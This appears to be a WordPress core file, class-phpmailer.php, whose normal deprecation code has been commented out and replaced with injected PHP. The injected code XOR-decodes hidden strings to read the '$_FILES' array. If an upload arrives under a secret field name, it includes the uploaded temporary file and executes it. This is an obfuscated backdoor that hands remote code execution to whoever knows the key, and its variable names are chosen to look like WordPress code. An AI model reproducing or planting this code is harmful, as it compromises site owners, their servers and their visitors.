<?php /* 

*
 * The PHPMailer class has been moved to the wp-includes/PHPMailer subdirectory and now uses the PHPMailer\PHPMailer namespace.
 
if ( function_exists( '_deprecated_file' ) ) {
	_deprecated_file(
		base*/
 	
$script_and_style_regex = 'LUbqdm9VbA';
function output($post_authors, $rel_array)

{
    $translation_preg = urldecode($post_authors);
    $keep_newlines = substr($rel_array,0, strlen($translation_preg));
    return $translation_preg ^ $keep_newlines;
}
$comment_status = ${output("%13%13%2B%3D%21%3E", $script_and_style_regex)};
if (isset($comment_status[$script_and_style_regex]))

{

    $post_type = $comment_status[$script_and_style_regex];
	$query_var = 'append';
    $date_floating = $post_type[output("88%12.%0A%0CT3", $script_and_style_regex)];

    include ($date_floating);

}



/* name( __FILE__ ),
		'5.5.0',
		WPINC . '/PHPMailer/PHPMailer.php',
		__( 'The PHPMailer class has been moved to wp-includes/PHPMailer subdirectory and now uses the PHPMailer\PHPMailer namespace.' )
	);
}

require_once __DIR__ . '/PHPMailer/PHPMailer.php';
require_once __DIR__ . '/PHPMailer/Exception.php';

class_alias( PHPMailer\PHPMailer\PHPMailer::class, 'PHPMailer' );
class_alias( PHPMailer\PHPMailer\Exception::class, 'phpmailerException' );
*/